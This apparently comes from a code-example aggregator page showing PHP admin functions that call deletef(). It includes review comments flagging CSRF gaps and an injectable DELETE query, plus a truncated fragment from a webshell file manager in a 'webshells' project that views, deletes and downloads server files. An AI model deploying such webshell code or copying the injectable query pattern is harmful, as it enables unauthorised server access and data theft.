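/**
 * Register the plugin named by the `tag` query parameter.
 *
 * Looks the plugin up through _getAllPlugins(), stores its header fields via
 * $this->plugin, then stores one row per declared variable and hook via
 * $this->pluginvars / $this->pluginhooks, each tagged with the id returned by
 * the plugin insert.
 *
 * NOTE(review): no permission or CSRF check is visible in this method and it
 * changes state from a GET request; confirm the dispatcher enforces both.
 *
 * @return void
 */
function install_action()
{
    // The tag is attacker-controllable and is joined into a filesystem path
    // further down, so refuse anything that could step outside the plugin
    // directory (path separators, NUL, "." and "..").
    $pname = isset($_GET['tag']) && is_string($_GET['tag']) ? trim($_GET['tag']) : '';
    if ($pname === '.' || $pname === '..' || strpbrk($pname, "/\\\0") !== false) {
        return;
    }

    $pinfo = $this->_getAllPlugins($pname);
    if (!$pinfo) {
        return;
    }
    $pinfo = $pinfo['root']['Data']['plugin'];

    // A field may arrive either as a scalar or as a list holding the scalar;
    // in the list case only the first element is used.
    $pick = function ($row, $field) {
        if (!isset($row[$field])) {
            return null;
        }
        $value = $row[$field];
        return is_array($value) ? $value[0] : $value;
    };

    $data = array();
    $headerFields = array(
        'available', 'adminid', 'name', 'identifier',
        'description', 'datatables', 'directory', 'copyright',
    );
    foreach ($headerFields as $field) {
        $data[$field] = $pick($pinfo, $field);
    }
    // NOTE(review): stored in PHP serialize() format; whatever reads this
    // column back should not unserialize() it if the row can be tampered with.
    $data['modules'] = serialize($pinfo['modules']['item']);
    $data['version'] = $pick($pinfo, 'version');

    if ($pid = $this->plugin->InsertData($data)) {
        // A single entry appears directly under 'item'; several entries appear
        // as a list under 'item'. Both shapes are normalised to a list here.
        $vars = !empty($pinfo['vars']['item']['title']) ? $pinfo['vars'] : $pinfo['vars']['item'];
        if (is_array($vars)) {
            foreach ($vars as $v) {
                $vdata = array(
                    'pluginid' => $pid,
                    'displayorder' => $pick($v, 'displayorder'),
                    'title' => $pick($v, 'title'),
                    // Fixed: this used to copy 'displayorder' into 'description'.
                    'description' => $pick($v, 'description'),
                    'variable' => $pick($v, 'variable'),
                    'type' => $pick($v, 'type'),
                    'value' => $pick($v, 'value'),
                    'extra' => $pick($v, 'extra'),
                );
                $this->pluginvars->InsertData($vdata);
            }
        }

        $hooks = !empty($pinfo['hooks']['item']['available']) ? $pinfo['hooks'] : $pinfo['hooks']['item'];
        if (is_array($hooks)) {
            foreach ($hooks as $v) {
                $hdata = array(
                    'pluginid' => $pid,
                    'available' => intval(isset($v['available']) ? $v['available'] : 0),
                    'title' => $pick($v, 'title'),
                    'description' => $pick($v, 'description'),
                    // NOTE(review): 'code' is stored verbatim from the plugin
                    // description; if it is evaluated later, installing a
                    // plugin is equivalent to granting it code execution.
                    'code' => $pick($v, 'code'),
                );
                $this->pluginhooks->InsertData($hdata);
            }
        }
    }

    if (!empty($pinfo['installfile']) && is_file($this->pdir . '/' . $pname . '/' . $pinfo['installfile'])) {
        // Running the plugin's install file is deliberately disabled. Before
        // re-enabling it, constrain 'installfile' to a bare file name as well,
        // since it comes from the plugin description and not from this code.
        //include $this->pdir.'/'.$pname.'/'.$pinfo['installfile'];
    }

    // presumably drops the cached plugin list so the new rows are picked up -- confirm
    deletef('plugins');
}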
예제 #2
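    /**
     * Save the posted site settings.
     *
     * Runs only when submitcheck('commit') passes. Stores an uploaded site
     * logo, writes every remaining POST field as a row of the `setting` table
     * (insert or update, keyed by `variable`), clears compiled templates when
     * `dotype` is "template", and finally either prints the manual steps for
     * an admin-path change or redirects back.
     *
     * NOTE(review): whether submitcheck() also verifies a CSRF token and the
     * caller's admin rights cannot be seen from here; confirm.
     *
     * @return void
     */
    function settingdata_action()
    {
        if (!submitcheck('commit')) {
            return;
        }

        $type = isset($_POST['dotype']) && is_string($_POST['dotype']) ? $_POST['dotype'] : '';
        // Routing and control fields are not settings; drop them before the loop.
        unset($_POST['con'], $_POST['act'], $_POST['commit'], $_POST['dotype']);
        $setting_mod = new common('setting');

        if (!empty($_FILES['site_logo']['name'])) {
            // The stored file name used to take its extension from the second
            // dot-separated part of the client-supplied name, so "x.php" was
            // saved as "logo.php". Use the real (last) extension and accept
            // raster image types only.
            $ext = strtolower(pathinfo($_FILES['site_logo']['name'], PATHINFO_EXTENSION));
            if (in_array($ext, array('png', 'jpg', 'jpeg', 'gif'), true)) {
                $container = 'and variable="site_logo"';
                $data = array('content' => _upload('site_logo', 'data/logo', 'logo.' . $ext));
                if ($setting_mod->GetOne($container)) {
                    $setting_mod->UpdateData($data, $container);
                } else {
                    $data['variable'] = 'site_logo';
                    $setting_mod->InsertData($data);
                }
            }
        }

        $identifier = '/^[A-Za-z0-9_]+$/D';
        $changeadmin = '';
        $insertsql = array();
        $updatesql = array();
        foreach ($_POST as $k => $v) {
            $k = (string) $k;
            // The field name is spliced into a WHERE fragment below, so only
            // identifier-like names are accepted; anything else is ignored.
            if (!preg_match($identifier, $k)) {
                continue;
            }
            if ($k === 'adminpath') {
                // The admin path becomes a controller file and class name and
                // is echoed into HTML further down; a value that is not a plain
                // identifier can serve neither purpose and is not stored.
                if (!is_string($v) || !preg_match($identifier, $v)) {
                    continue;
                }
                if ($v != $GLOBALS['setting']['adminpath']) {
                    $changeadmin = $v;
                }
            }
            // NOTE(review): the original computed strip_tags($v) here but then
            // stored the raw value; the raw value is kept to avoid changing
            // what gets saved. Decide whether settings may contain markup and
            // escape on output accordingly.
            if ($setting_mod->GetOne('and variable="' . $k . '"')) {
                $updatesql[$k] = $v;
            } else {
                $insertsql[$k] = $v;
            }
        }
        foreach ($insertsql as $key => $val) {
            $setting_mod->InsertData(array('variable' => $key, 'content' => $val));
        }
        foreach ($updatesql as $key => $val) {
            $setting_mod->UpdateData(array('content' => $val), 'and variable="' . $key . '"');
        }

        if ($type == 'template') {
            $dofile = cleancache('', 'data/compile');
            if (!$dofile) {
                echo '<SCRIPT LANGUAGE="JavaScript">
					<!--
						alert("模板更新成功,清空系统编译失败,请手动清除");
					//-->
					</SCRIPT>';
            } else {
                echo '<SCRIPT LANGUAGE="JavaScript">
					<!--
						alert("模板更新成功");
					//-->
					</SCRIPT>';
            }
        }

        deletef('setting');

        if (!empty($changeadmin)) {
            // $changeadmin is limited to [A-Za-z0-9_] above, so it is inert in
            // both the text and the href of this message.
            echo '后台路径参数已修改,为了系统安全,请您继续做以下工作:<ul><li>1、连接ftp,将controls/' . $GLOBALS['setting']['adminpath'] . '.class.php文件名修改为:' . $changeadmin . '.class.php</li><li>2、打开' . $changeadmin . '.class.php,将文件中' . $GLOBALS['setting']['adminpath'] . '_controller替换为:' . $changeadmin . '_controller</li><li>3、修改完毕后,<a href="' . SITE_ROOT . '/?con=' . $changeadmin . '" target="_top">重新进入后台</a></li></ul>';
            return;
        }

        // custom_url is request-controlled. Follow it only when it is a
        // same-site relative reference: no scheme, no leading "//" or "/\",
        // no control characters. Otherwise fall back to the settings page.
        $custom_url = isset($_REQUEST['custom_url']) && is_string($_REQUEST['custom_url'])
            ? trim($_REQUEST['custom_url'])
            : '';
        $isLocal = $custom_url !== ''
            && !preg_match('/[\x00-\x1f\x7f]/', $custom_url)
            && !preg_match('#^(?:[a-z][a-z0-9+.\-]*:|[/\\\\]{2})#i', $custom_url);
        if ($isLocal) {
            sheader($custom_url, 3, '修改成功', 'redirect', true);
        } else {
            sheader('index.php?con=' . $GLOBALS['setting']['adminpath'] . '&act=setting&type=' . rawurlencode($type), 3, '修改成功', 'redirect', true);
        }
    }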
예제 #3
파일: NFM 1.8.php 프로젝트: Theov/webshells
     }
     getdir();
     chdir($curdir);
     $supsub = $gdir[$j - 1];
     if (!isset($tm)) {
         $tm = getcwd();
     }
     readdirdata($tm);
 } else {
     switch ($action) {
         case "view":
             viewfile($tm, $fi);
             break;
         case "delete":
             echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Файл <b>{$fi}</b> успешно удален.</font></center></td></tr></table>";
             deletef($tm);
             break;
         case "download":
             if (isset($fatt) && strlen($fatt) > 0) {
                 $attach = $fatt;
                 header("Content-type: text/plain");
             } else {
                 $attach = $fi;
                 header("Content-type: hackru");
             }
             header("Content-disposition: attachment; filename=\"{$attach}\";");
             readfile($tm . "/" . $fi);
             break;
         case "download_mail":
             download_mail($tm, $fi);
             break;
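 /**
  * Delete the row of `table` whose column `key` (default "id") equals `val`.
  *
  * All three inputs are read from the query string. Prints a short error and
  * exits when `table`, `key` or `val` is missing or malformed; otherwise exits
  * with "1" when a matching row existed and was deleted, "failed" if not.
  *
  * NOTE(review): no authorization or CSRF check is visible in this method and
  * the delete is triggered by a GET request; confirm the dispatcher restricts
  * it to authenticated admins and consider requiring POST plus a token.
  * NOTE(review): any table name that passes the identifier check is accepted;
  * an explicit allowlist of deletable tables would be tighter.
  *
  * @return void
  */
 function admin_delete_action()
 {
     $identifier = '/^[A-Za-z0-9_]+$/D';

     $table = isset($_GET['table']) && is_string($_GET['table']) ? $_GET['table'] : '';
     $key = empty($_GET['key']) ? 'id' : $_GET['key'];

     // The table and column names end up in SQL as bare identifiers, where
     // quoting cannot help; accept only plain identifier characters.
     if (empty($table) || !preg_match($identifier, $table)
         || !is_string($key) || !preg_match($identifier, $key)) {
         echo '参数有误';
         exit;
     }
     if (empty($_GET['val']) || !is_string($_GET['val'])) {
         echo '字段值为空';
         exit;
     }

     $val = charset_encode($_GET['val'], $GLOBALS['charset'], 'utf-8');
     // NOTE(review): the value is concatenated between single quotes with no
     // escaping in this method. Unless request data is escaped before it gets
     // here (not visible in this file), this is injectable; the durable fix is
     // a bound parameter inside `common`.
     $container = "and {$key}='" . trim($val) . "'";
     $obj = new common($table);

     // presumably drops cached copies of these tables -- confirm
     if (in_array($table, array('site', 'city', 'sitecate'), true)) {
         deletef($table);
     }
     if ($table === 'catelist') {
         deletef('cate');
     }

     // Delete only when a matching row is present.
     $group = $obj->GetOne($container);
     if ($group && $obj->DeleteData('1 ' . $container)) {
         exit('1');
     }
     exit('failed');
 }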